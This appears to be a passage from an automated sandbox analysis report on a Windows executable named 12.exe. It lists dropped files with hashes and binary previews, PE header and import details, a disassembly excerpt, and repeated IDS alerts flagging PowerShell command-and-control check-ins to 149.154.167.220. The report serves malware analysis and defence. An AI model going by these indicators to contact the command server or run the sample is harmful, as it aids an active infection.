                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                Category:dropped
                                                                                Size (bytes):1419751
                                                                                Entropy (8bit):7.976496077007677
                                                                                Encrypted:false
                                                                                SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                Malicious:false
                                                                                Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                Process:C:\Users\user\Desktop\12.exe
                                                                                File Type:PDF document, version 1.7
                                                                                Category:dropped
                                                                                Size (bytes):9
                                                                                Entropy (8bit):3.169925001442312
                                                                                Encrypted:false
                                                                                SSDEEP:3:Imvn:IY
                                                                                MD5:B491DE58BA84D5E12333A236ADD6DDB5
                                                                                SHA1:EEBE4E01AA9B893BFFF8BF5A8CD9A0BA1D939D44
                                                                                SHA-256:0716F9264C9FE19F5D7455276107F3DDCC1D3497F63D60689A73558AE8A1BF5E
                                                                                SHA-512:BC3A2934AEF2582C7DBF748F46DCB6BE3A70F43B6DD335EFEDDA0AC12DB31B0A4C4E4EECF2798A9B4400A5EE5EDA9CFCD9AEA4285BD9703DF6D2498F3D4A477A
                                                                                Malicious:false
                                                                                Preview:%PDF-1.7.
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):6222
                                                                                Entropy (8bit):3.696317117414588
                                                                                Encrypted:false
                                                                                SSDEEP:96:gTffzq0vCYMokkvhkvCCta2B02OYUHx2B02OYVHC:g/gTa2Bg2Bu
                                                                                MD5:0A9D5FAE106955334C786D06F9799085
                                                                                SHA1:A91AF9A87FA319F21BFB4D42D99256986114A29B
                                                                                SHA-256:720409B429A8C6370C352A449A11CBF1A0E30992FB080518726794466E0FFD2F
                                                                                SHA-512:F279E3BB403B90BF7DB642B662C643CCBDDC5DD31706080EE86FB1A46A1A27FDA37AC93DFDE53FD4AC0A3451F3D9F77DD486E21CB819F472FFB80F99EC668F3F
                                                                                Malicious:false
                                                                                Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M...... ./cf....B4cf......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.ZnH....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......ZqH..Roaming.@......DWSl.ZqH....C.....................^/..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.ZnH....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.ZnH....E.....................T...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.ZnH....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.ZnH....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):6222
                                                                                Entropy (8bit):3.696317117414588
                                                                                Encrypted:false
                                                                                SSDEEP:96:gTffzq0vCYMokkvhkvCCta2B02OYUHx2B02OYVHC:g/gTa2Bg2Bu
                                                                                MD5:0A9D5FAE106955334C786D06F9799085
                                                                                SHA1:A91AF9A87FA319F21BFB4D42D99256986114A29B
                                                                                SHA-256:720409B429A8C6370C352A449A11CBF1A0E30992FB080518726794466E0FFD2F
                                                                                SHA-512:F279E3BB403B90BF7DB642B662C643CCBDDC5DD31706080EE86FB1A46A1A27FDA37AC93DFDE53FD4AC0A3451F3D9F77DD486E21CB819F472FFB80F99EC668F3F
                                                                                Malicious:false
                                                                                Preview:...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M...... ./cf....B4cf......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.ZnH....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......ZqH..Roaming.@......DWSl.ZqH....C.....................^/..R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.ZnH....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.ZnH....E.....................T...W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.ZnH....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.ZnH....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                Entropy (8bit):6.1963492880257665
                                                                                TrID:
                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:12.exe
                                                                                File size:232'448 bytes
                                                                                MD5:90f2ca0a38d6e5416ee2f6be6326521d
                                                                                SHA1:00bf14e8153778835f95b9255ae1658e37819f8d
                                                                                SHA256:6534d5fd803f9c85bec3a820cef54f953e8643f3a4e16677d11decbf1a5b54c7
                                                                                SHA512:aa07eb51552921407b0407456f4a0235198e8bdb33981097bf034018b0e181eab6cc37bd695f9342e9e1a8c61a2094bfc2241592b8598c1a864468798f74912d
                                                                                SSDEEP:6144:5C+bHVcNxsYQ9I8ZIH9x7Uj6JBTLCZVFigz:E0HVuxsYn8GH9x7Uj6JBTLCZ
                                                                                TLSH:65346B69B7A40CF8E67B9279CC561A05D6B6BC074760EBCF03D006569F232D09E3EB61
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X"..9LU.9LU.9LU.AOT.9LU.AITb9LU.AHT.9LU..OT.9LU..HT.9LU..IT.9LU.AMT.9LU.9MU.9LU..ET.9LU...U.9LU..NT.9LURich.9LU...............
                                                                                Icon Hash:00928e8e8686b000
                                                                                Entrypoint:0x140008398
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x140000000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6769010D [Mon Dec 23 06:19:57 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:0
                                                                                File Version Major:6
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:bae9372ed29a79b82eb7891c89186cec
                                                                                Instruction
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                call 00007FA835B547E0h
                                                                                dec eax
                                                                                add esp, 28h
                                                                                jmp 00007FA835B53CFFh
                                                                                int3
                                                                                int3
                                                                                dec eax
                                                                                sub esp, 28h
                                                                                dec ebp
                                                                                mov eax, dword ptr [ecx+38h]
                                                                                dec eax
                                                                                mov ecx, edx
                                                                                dec ecx
                                                                                mov edx, ecx
                                                                                call 00007FA835B53E92h
                                                                                mov eax, 00000001h
                                                                                dec eax
                                                                                add esp, 28h
                                                                                ret
                                                                                int3
                                                                                int3
                                                                                int3
                                                                                inc eax
                                                                                push ebx
                                                                                inc ebp
                                                                                mov ebx, dword ptr [eax]
                                                                                dec eax
                                                                                mov ebx, edx
                                                                                inc ecx
                                                                                and ebx, FFFFFFF8h
                                                                                dec esp
                                                                                mov ecx, ecx
                                                                                inc ecx
                                                                                test byte ptr [eax], 00000004h
                                                                                dec esp
                                                                                mov edx, ecx
                                                                                je 00007FA835B53E95h
                                                                                inc ecx
                                                                                mov eax, dword ptr [eax+08h]
                                                                                dec ebp
                                                                                arpl word ptr [eax+04h], dx
                                                                                neg eax
                                                                                dec esp
                                                                                add edx, ecx
                                                                                dec eax
                                                                                arpl ax, cx
                                                                                dec esp
                                                                                and edx, ecx
                                                                                dec ecx
                                                                                arpl bx, ax
                                                                                dec edx
                                                                                mov edx, dword ptr [eax+edx]
                                                                                dec eax
                                                                                mov eax, dword ptr [ebx+10h]
                                                                                mov ecx, dword ptr [eax+08h]
                                                                                dec eax
                                                                                mov eax, dword ptr [ebx+08h]
                                                                                test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                je 00007FA835B53E8Dh
                                                                                movzx eax, byte ptr [ecx+eax+03h]
                                                                                and eax, FFFFFFF0h
                                                                                dec esp
                                                                                add ecx, eax
                                                                                dec esp
                                                                                xor ecx, edx
                                                                                dec ecx
                                                                                mov ecx, ecx
                                                                                pop ebx
                                                                                jmp 00007FA835B538CEh
                                                                                int3
                                                                                dec eax
                                                                                mov eax, esp
                                                                                dec eax
                                                                                mov dword ptr [eax+08h], ebx
                                                                                dec eax
                                                                                mov dword ptr [eax+10h], ebp
                                                                                dec eax
                                                                                mov dword ptr [eax+18h], esi
                                                                                dec eax
                                                                                mov dword ptr [eax+20h], edi
                                                                                inc ecx
                                                                                push esi
                                                                                dec eax
                                                                                sub esp, 20h
                                                                                dec ecx
                                                                                mov ebx, dword ptr [ecx+38h]
                                                                                dec eax
                                                                                mov esi, edx
                                                                                dec ebp
                                                                                mov esi, eax
                                                                                dec eax
                                                                                mov ebp, ecx
                                                                                dec ecx
                                                                                mov edx, ecx
                                                                                dec eax
                                                                                mov ecx, esi
                                                                                dec ecx
                                                                                mov edi, ecx
                                                                                dec esp
                                                                                lea eax, dword ptr [ebx+04h]
                                                                                call 00007FA835B53DF1h
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x34d500x28.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c0000x1e0.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x390000x222c.pdata
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3d0000x960.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x30c600x70.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x30b200x140.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x240000x2e8.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x22a300x22c00cdb7432b3f088c769eb16769c4424884False0.5556640625data6.4462504419943IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x240000x117000x11800e0d54e3796ebc0fb78d4078789258b4bFalse0.3832310267857143data4.976685659786107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x360000x2a440x14009c8cd079a9c68b3eb4060a0a7282fe58False0.168359375DOS executable (block device driver)2.7946886101663733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .pdata0x390000x222c0x2400e000eee54fad835513101cb67b3c1fa0False0.4638671875data5.167999163396566IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x3c0000x1e00x20063a978a93afb85b47b650b22380a3ca0False0.53125data4.7176788329467545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x3d0000x9600xa0041784215a8e29e2be4bfc51218173d3fFalse0.498828125data5.324888411724977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_MANIFEST0x3c0600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                DLLImport
                                                                                KERNEL32.dllInitializeCriticalSectionEx, WaitForSingleObject, GetLastError, CloseHandle, DecodePointer, DeleteCriticalSection, CreateProcessW, SetEndOfFile, WriteConsoleW, SetStdHandle, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateFileW, FindClose, FindFirstFileExW, FindNextFileW, GetFileAttributesW, GetTempPathW, AreFileApisANSI, GetModuleHandleW, GetProcAddress, MultiByteToWideChar, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, EncodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, RaiseException, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, WriteFile, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, RtlUnwind
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2025-01-14T10:03:45.210761+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549704149.154.167.220443TCP
                                                                                2025-01-14T10:03:45.210761+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.549704149.154.167.220443TCP
                                                                                2025-01-14T10:03:48.462922+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549705149.154.167.220443TCP
                                                                                2025-01-14T10:03:48.462922+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705149.154.167.220443TCP
                                                                                2025-01-14T10:03:48.462922+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.549705149.154.167.220443TCP
                                                                                2025-01-14T10:04:02.723979+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549725149.154.167.220443TCP
                                                                                2025-01-14T10:04:02.723979+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549725149.154.167.220443TCP
                                                                                2025-01-14T10:04:02.723979+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.549725149.154.167.220443TCP
                                                                                2025-01-14T10:04:11.695646+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.549794149.154.167.220443TCP
                                                                                2025-01-14T10:04:11.695646+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549794149.154.167.220443TCP
                                                                                2025-01-14T10:04:11.695646+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.549794149.154.167.220443TCP
                                                                                2025-01-14T10:04:17.590674+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564791149.154.167.220443TCP
                                                                                2025-01-14T10:04:17.590674+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564791149.154.167.220443TCP
                                                                                2025-01-14T10:04:17.590674+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564791149.154.167.220443TCP
                                                                                2025-01-14T10:04:28.554435+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564862149.154.167.220443TCP
                                                                                2025-01-14T10:04:28.554435+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564862149.154.167.220443TCP
                                                                                2025-01-14T10:04:28.554435+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564862149.154.167.220443TCP
                                                                                2025-01-14T10:04:42.657834+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564944149.154.167.220443TCP
                                                                                2025-01-14T10:04:42.657834+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564944149.154.167.220443TCP
                                                                                2025-01-14T10:04:42.657834+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564944149.154.167.220443TCP
                                                                                2025-01-14T10:04:50.700050+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564975149.154.167.220443TCP
                                                                                2025-01-14T10:04:50.700050+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564975149.154.167.220443TCP
                                                                                2025-01-14T10:04:50.700050+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564975149.154.167.220443TCP
                                                                                2025-01-14T10:05:00.628281+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564976149.154.167.220443TCP
                                                                                2025-01-14T10:05:00.628281+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564976149.154.167.220443TCP
                                                                                2025-01-14T10:05:00.628281+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564976149.154.167.220443TCP
                                                                                2025-01-14T10:05:06.500484+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564977149.154.167.220443TCP
                                                                                2025-01-14T10:05:06.500484+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564977149.154.167.220443TCP
                                                                                2025-01-14T10:05:06.500484+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564977149.154.167.220443TCP
                                                                                2025-01-14T10:05:09.434763+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564978149.154.167.220443TCP
                                                                                2025-01-14T10:05:09.434763+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564978149.154.167.220443TCP
                                                                                2025-01-14T10:05:09.434763+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564978149.154.167.220443TCP
                                                                                2025-01-14T10:05:12.303603+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564979149.154.167.220443TCP
                                                                                2025-01-14T10:05:12.303603+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564979149.154.167.220443TCP
                                                                                2025-01-14T10:05:12.303603+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564979149.154.167.220443TCP
                                                                                2025-01-14T10:05:17.906176+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564980149.154.167.220443TCP
                                                                                2025-01-14T10:05:17.906176+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564980149.154.167.220443TCP
                                                                                2025-01-14T10:05:17.906176+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564980149.154.167.220443TCP
                                                                                2025-01-14T10:05:24.946423+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564981149.154.167.220443TCP
                                                                                2025-01-14T10:05:24.946423+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564981149.154.167.220443TCP
                                                                                2025-01-14T10:05:24.946423+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564981149.154.167.220443TCP
                                                                                2025-01-14T10:05:33.800975+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564982149.154.167.220443TCP
                                                                                2025-01-14T10:05:33.800975+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564982149.154.167.220443TCP
                                                                                2025-01-14T10:05:33.800975+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564982149.154.167.220443TCP
                                                                                2025-01-14T10:05:36.807885+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564983149.154.167.220443TCP
                                                                                2025-01-14T10:05:36.807885+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564983149.154.167.220443TCP
                                                                                2025-01-14T10:05:36.807885+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564983149.154.167.220443TCP
                                                                                2025-01-14T10:05:39.687968+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564984149.154.167.220443TCP
                                                                                2025-01-14T10:05:39.687968+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564984149.154.167.220443TCP
                                                                                2025-01-14T10:05:39.687968+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564984149.154.167.220443TCP
                                                                                2025-01-14T10:05:45.598094+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564985149.154.167.220443TCP
                                                                                2025-01-14T10:05:45.598094+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564985149.154.167.220443TCP
                                                                                2025-01-14T10:05:45.598094+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564985149.154.167.220443TCP
                                                                                2025-01-14T10:05:50.635229+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564986149.154.167.220443TCP
                                                                                2025-01-14T10:05:50.635229+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564986149.154.167.220443TCP
                                                                                2025-01-14T10:05:50.635229+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564986149.154.167.220443TCP
                                                                                2025-01-14T10:06:03.686867+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564987149.154.167.220443TCP
                                                                                2025-01-14T10:06:03.686867+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564987149.154.167.220443TCP
                                                                                2025-01-14T10:06:03.686867+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564987149.154.167.220443TCP
                                                                                2025-01-14T10:06:05.631751+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564988149.154.167.220443TCP
                                                                                2025-01-14T10:06:05.631751+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564988149.154.167.220443TCP
                                                                                2025-01-14T10:06:05.631751+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564988149.154.167.220443TCP
                                                                                2025-01-14T10:06:08.881366+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564989149.154.167.220443TCP
                                                                                2025-01-14T10:06:08.881366+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564989149.154.167.220443TCP
                                                                                2025-01-14T10:06:08.881366+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564989149.154.167.220443TCP
                                                                                2025-01-14T10:06:19.882827+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564990149.154.167.220443TCP
                                                                                2025-01-14T10:06:19.882827+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564990149.154.167.220443TCP
                                                                                2025-01-14T10:06:19.882827+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564990149.154.167.220443TCP
                                                                                2025-01-14T10:06:20.935845+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564991149.154.167.220443TCP
                                                                                2025-01-14T10:06:20.935845+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564991149.154.167.220443TCP
                                                                                2025-01-14T10:06:20.935845+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564991149.154.167.220443TCP
                                                                                2025-01-14T10:06:35.060683+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564992149.154.167.220443TCP
                                                                                2025-01-14T10:06:35.060683+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564992149.154.167.220443TCP
                                                                                2025-01-14T10:06:35.060683+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564992149.154.167.220443TCP
                                                                                2025-01-14T10:06:40.934228+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.2.564993149.154.167.220443TCP
                                                                                2025-01-14T10:06:40.934228+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.564993149.154.167.220443TCP
                                                                                2025-01-14T10:06:40.934228+01002058964ET MALWARE Telemiris CnC Checkin1192.168.2.564993149.154.167.220443TCP
